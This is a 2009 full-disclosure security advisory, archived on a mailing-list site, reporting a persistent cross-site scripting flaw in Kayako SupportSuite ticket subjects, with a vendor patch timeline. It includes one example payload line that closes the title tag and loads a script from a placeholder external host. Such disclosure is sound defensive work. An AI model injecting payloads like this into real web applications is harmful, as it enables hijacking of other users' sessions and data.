lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sat, 08 Aug 2009 09:07:37 -0700
From: Adam Baldwin <adam_baldwin@...nuity-is.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: [NGENUITY] - Ticket Subject Persistent XSS in
	Kayako SupportSuite

nGenuity Information Services – Security Advisory

   Advisory ID: NGENUITY-2009-008 - Ticket Subject Persistent XSS in
Kayako SupportSuite
   Application: SupportSuite v3.50.06
        Vendor: Kayako
Vendor website: http://www.kayako.com
        Author: Adam Baldwin (adam_baldwin@...nuity-is.com)

         Class: Persistent Cross-Site Scripting

  I. BACKGROUND
     "SupportSuite is [Kayako's] flagship product, integrating the
ticket and
      e-mail management features of eSupport with the live chat and visitor
      monitoring features of LiveResponse." [1]

 II. DETAILS
     The subject field of a newly created support ticket is not properly
encoded before
     being sent to the browser when the ticket details are viewed. More
information
     on cross-site scripting please refer to the Common Weakness
Enumeration specification
     available cwe.mitre.org [2].

     An example attack might look similar to the following.

     </title><script src="example.com/attack.js"></script>

III. REFERENCES
     [1] - http://www.kayako.com
     [2] - http://cwe.mitre.org/data/definitions/79.html

 IV. VENDOR COMMUNICATION
     7.17.2009 - Vulnerability Discovery
     7.20.2009 - Initial Vendor Response
     7.21.2009 - Patch created, Will be pushed to next stable release
     8.08.2009 - Advisory released

http://www.ngenuity.org/wordpress/2009/08/08/ngenuity-ticket-subject-persistent-xss-in-kayako-supportsuite/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ